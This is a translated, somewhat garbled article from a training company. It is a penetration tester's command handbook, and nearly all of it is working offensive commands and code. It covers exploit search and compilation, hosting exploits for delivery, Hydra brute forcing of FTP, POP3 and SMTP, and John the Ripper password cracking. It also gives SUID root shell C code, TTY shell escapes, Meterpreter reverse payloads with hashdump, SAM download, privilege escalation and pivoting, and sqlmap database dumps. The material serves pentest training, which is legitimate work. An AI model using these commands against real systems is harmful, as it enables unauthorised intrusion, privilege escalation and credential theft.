Pentestit Corporate Laboratories: Case Analysis for Penetration Testing
Pentestit corporate laboratories are unique in their format and content, practical information security training courses, developed on the basis of the best penetration testing practices and security analysis, comparable in content to hacker conferences. Regardless of the training programs, their key features are relevant material and practical training in pentest laboratories, making up 80% of the total program of the course. In this article we will continue to analyze the basis of commands and useful tricks when conducting penetration testing.
Handbook pentester part 2
This handbook is a list of commands that you may need when conducting penetration testing. This handbook is designed in such a way that it does not provide a detailed description of the commands, but only gives working examples. For more information about the team or utility, we recommend that you study its man page or visit the official website.
This handbook is more concerned with network and infrastructure testing. Testing web applications is not covered in this reference, except for a few examples with sqlmap at the end of this tutorial. The first part of the directory.
Search for exploits for detected services
Search for exploit-db through searchsploit, in this example, search for elevation elevation for windows 2003:
searchsploit windows 2003 | grep -i local Using google to search the site exploit-db.com:
site:exploit-db.com exploit kernel <= 3 Look for suitable meta-explosive modules with grep. Standard search using search in msf works worse:
grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/* Install a local copy of the exploit-db database:
searchsploit –u searchsploit apache 2.2 searchsploit "Linux Kernel" searchsploit linux 2.6 | grep -i ubuntu | grep local Compiling exploits for Windows in Kali:
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download wine mingw-get-setup.exe select mingw32-base cd /root/.wine/drive_c/windows wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip cd /root/.wine/drive_c/MinGW/bin wine gcc -o ability.exe /tmp/exploit.c -lwsock32 wine ability.exe Compilation for x32 and x64 architects:
gcc -m32 -o output32 hello.c (32 bit) gcc -m64 -o output hello.c (64 bit) Run a simple local web server
Useful for delivering exploits and programs to the target machine. Run a simple http web server in Python:
python -m SimpleHTTPServer 80 Run a simple Python3 web server:
python3 -m http.server Starting a simple Ruby webrick http server:
ruby -rwebrick -e "WEBrick::HTTPServer.new (:Port => 80, :DocumentRoot => Dir.pwd).start" Run a simple php http server:
php -S 0.0.0.0:80 Mounting file resources
Mounting a NFS resource in / mnt / nfs:
mount 192.168.1.1:/vol/share /mnt/nfs Mounting a Windows CIFS / SMB resource on Linux in / mnt / cifs If you delete the password, you will be asked about it in the console (a safer option, since it will not be written in bash.history):
mount -t cifs -o username=user,password=pass,domain=bla //192.168.1.X/share-name /mnt/cifs Mounting a Windows resource on Windows from the command line:
net use Z: \\win-server\share password /user:domain\johndoe /savecred /p:no Installing smb4k on Kali, a useful Linux GUI to view SMB resources:
apt-get install smb4k -y Examining HTTP / HTTPS Web Servers
Run nikto scan:
nikto -h 192.168.1.1 Configurable via GUI, CLI input usually does not work:
dirbuster Simple directory bruteformer:
dirb http://example.org Advanced directory and file bruteformer. Search for files with php and js extension using the dictionary:
dirsearch.py --random-agents -u example.org -e php,js Network packet analysis
tcpdump for port 80 on interface eth0, output to output.pcap:
tcpdump tcp port 80 -w output.pcap -i eth0 Credential Detection
Several techniques to learn credentials from remote services.
SMB
Collection of SMB users:
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX RID cycle SMB / collection of SMB users
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt SNMP
Collection of SNMP users:
snmpwalk public -v1 192.168.X.XXX 1 |grep 11.11.11.11 |cut -d” “ -f4 python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt Brutfors network services
Hydra FTP brute force
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f 192.168.X.XXX ftp -V Hydra pop3 brute force
hydra -L users.txt -P /usr/share/wordlistsnmap.lst 192.168.X.XXX pop3 -V Hydra SMTP brute force
hydra -l user@example.com -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -V Brute force passwords john the ripper
Hacking with a dictionary
john --wordlist=/usr/share/wordlists/rockyou.txt hashes MD5 hacking with a dictionary
john --format=MD5 --wordlist /usr/share/wordlists/rockyou.txt hash.txt DES brute force
john --format=DES hash --show SUID
It often happens that a vulnerable executable file has a SUID bit, but inside the program itself, the effective UID changes to an unprivileged before a vulnerable call, and we need to get a shell with superuser rights. To restore root rights and get a shell, you can use the code below.
SUID C shell for / bin / bash:
int main(void){ setresuid(0, 0, 0); system("/bin/bash"); } SUID C shell for / bin / sh:
int main(void){ setresuid(0, 0, 0); system("/bin/sh"); } Compile suid shell executable file:
gcc -o suid suid.c For 32 bits:
gcc -m32 -o suid suid.c Tty shells
Examples of creating TTY shells from a limited shell in Linux, useful for running commands like su from the reverse of the shell. Python tty shell:
python -c 'import pty;pty.spawn("/bin/bash")' echo os.system('/bin/bash') Getting interactive sh shell:
/bin/sh -i Getting the perl tty shell:
exec "/bin/sh"; perl -e 'exec "/bin/sh";' Getting Ruby TTY Shell:
exec "/bin/sh" Getting Lua TTY Shell:
os.execute('/bin/sh') Getting a TTY shell from Vi:
:!bash Getting TTY shell via NMAP (old versions)
nmap --interactive !sh Metasploit / Meterpreter
Windows reverse meterpreter payload with reverse connection:
set payload windows/meterpreter/reverse_tcp Windows VNC Meterpreter payload
set payload windows/vncinject/reverse_tcp set ViewOnly false Linux Reverse Meterpreter payload with reverse connection
set payload linux/meterpreter/reverse_tcp Meterpreter Handbook
Download the file on windows machine via Meterpreter:
upload file c:\\windows Download the file from the target Windows machine via Meterpreter:
download c:\\windows\\repair\\sam /tmp Run exe file via Meterpreter - Ideal for executing downloaded exploits:
execute -fc:\\windows\temp\exploit.exe Creating a new channel with cmd shell:
execute -f cmd -c Meterpreter will show processes:
ps Meterpreter will receive a shell for the current session:
shell Meterpreter will try to raise privileges in the system:
getsystem Meterpreter will try to get the hashes of OS users:
hashdump Meterpreter creates a port redirection through the target machine (pivoting):
portfwd add –l 3389 –p 3389 –r target_host Meterpreter removes port forwarding (pivoting):
portfwd delete –l 3389 –p 3389 –r target_host SQLMap examples
Auto mode:
sqlmap -u http://site --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 Target scan:
Sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/bla.php" Scan the url on union + error based injection for mysql and use a random user agent + to get a dump of the database:
sqlmap -u "http://site/bla.php?id=1" --dbms=mysql --tech=U --random-agent --dump Sqlmap form validation per injection:
sqlmap -o -u "http://site/form/" --forms Sqlmap dump database and hacking hashes for the database table database-name:
sqlmap -o -u "http://site/vuln-form" --forms -D database-name -T users --dump Determining the type of hashes
It is most convenient to use the hash-identifier utility, but for clarity I will present several types of hashes visually:
MD5 Hash:
8743b52063cd84097a65d1633f5c74f5 MD5 $ PASS: $ SALT:
01dfae6e5d4d90d9892622325959afbe:7050461 MD5 $ SALT: $ PASS:
f0fda58630310a6dd91a7d8f0a4ceda2:4225637426 SHA1 Hash:
b89eaac7e61417341b710b727768294d0e6a277b SHA1 $ PASS: $ SALT:
2fc5a684737ce1bf7b3b239df432416e0dd07357:2014 SHA1 $ SALT: $ PASS:
cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024 SHA-256:
127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935 SHA-256 $ PASS: $ SALT:
c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4 SHA-256 $ SALT: $ PASS:
eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617 SHA-512:
82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f SHA-512 $ PASS: $ SALT:
e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd SHA-512 $ SALT: $ PASS:
976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a NTLM:
b4b9b02e6f09a9bd760f388b67351e2b Conclusion
In order to successfully resist attackers, it is necessary to know well the methods and tools of work, which is extremely difficult, given their rapid development. The course program is updated with each set, which allows you to provide relevant and relevant knowledge and practical skills in the field of information security.
The uniqueness of the course program in the presentation and consolidation of the material - 20% of theory and 80% of practice. Constantly updating the methodological material and adding practical tasks, we try to give the most complete amount of information so that the course participants receive comprehensive information on current threats and methods of counteraction, open new development vectors in the field of practical information security.
')
Source: https://habr.com/ru/post/325602/
All Articles